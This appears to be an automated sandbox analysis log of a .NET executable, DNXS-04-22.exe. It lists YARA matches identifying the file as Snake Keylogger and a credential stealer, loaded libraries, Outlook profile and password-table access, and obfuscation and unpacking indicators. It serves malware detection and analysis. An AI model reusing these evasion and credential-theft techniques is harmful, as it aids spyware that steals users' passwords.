Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_067789B0	4_2_067789B0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677D268	4_2_0677D268
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677CE10	4_2_0677CE10
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677CE01	4_2_0677CE01
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677D6C0	4_2_0677D6C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677DF70	4_2_0677DF70
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677DB18	4_2_0677DB18
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677DB09	4_2_0677DB09
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677E3C8	4_2_0677E3C8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677EC78	4_2_0677EC78
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06770C50	4_2_06770C50
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677E820	4_2_0677E820
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06770007	4_2_06770007
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06778008	4_2_06778008
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C0F7	4_2_0677C0F7
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677F0D0	4_2_0677F0D0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_067710C0	4_2_067710C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677F0C0	4_2_0677F0C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_067710B0	4_2_067710B0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06774480	4_2_06774480
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771970	4_2_06771970
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C560	4_2_0677C560
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C550	4_2_0677C550
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771520	4_2_06771520
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677F528	4_2_0677F528
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771510	4_2_06771510
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C108	4_2_0677C108
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771DD0	4_2_06771DD0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C9B8	4_2_0677C9B8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677C9A9	4_2_0677C9A9
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771980	4_2_06771980
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_0677F980	4_2_0677F980

Source: DNXS-04-22.exe, 00000000.00000000.1329973525.0000000000956000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameJWXz.exe> vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1367508302.0000000007830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1341429256.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000000.00000002.1370880618.0000000008220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
Source: DNXS-04-22.exe, 00000004.00000002.3785108965.0000000000B57000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs DNXS-04-22.exe
Source: DNXS-04-22.exe	Binary or memory string: OriginalFilenameJWXz.exe> vs DNXS-04-22.exe

Source: DNXS-04-22.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: DNXS-04-22.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, 2Ac.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, 2Ac.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, 2Ac.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, 2Ac.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, mY3IKt45gSW4nI9Ksv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: _0020.AddAccessRule
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, mY3IKt45gSW4nI9Ksv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: _0020.SetAccessControl
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/0@4/3

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: DNXS-04-22.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DNXS-04-22.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CCF000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3788292550.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DNXS-04-22.exe	ReversingLabs: Detection: 65%
Source: DNXS-04-22.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\DNXS-04-22.exe

File read: C:\Users\user\Desktop\DNXS-04-22.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Process created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: DNXS-04-22.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DNXS-04-22.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DNXS-04-22.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: JWXz.pdb source: DNXS-04-22.exe
Source:	Binary string: JWXz.pdbSHA256 source: DNXS-04-22.exe

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.cs

.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: DNXS-04-22.exe, BillsScreen.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	.Net Code: uvccqWHofG System.Reflection.Assembly.Load(byte[])
Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs	.Net Code: uvccqWHofG System.Reflection.Assembly.Load(byte[])
Source: 0.2.DNXS-04-22.exe.2e91290.6.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.DNXS-04-22.exe.8220000.13.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: DNXS-04-22.exe

Static PE information: 0x87074BFA [Mon Oct 14 22:26:02 2041 UTC]

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BE3D8 pushad ; ret	0_2_075BE3D9
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07F31520 push 2405F7CBh; retf	0_2_07F31525
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C9770 push esp; ret	4_2_028C9771
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C2511 push 8BFFFFFFh; retf	4_2_028C2517
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06777C1B push es; iretd	4_2_06777C1C

Source: DNXS-04-22.exe

Static PE information: section name: .text entropy: 7.955380797779595

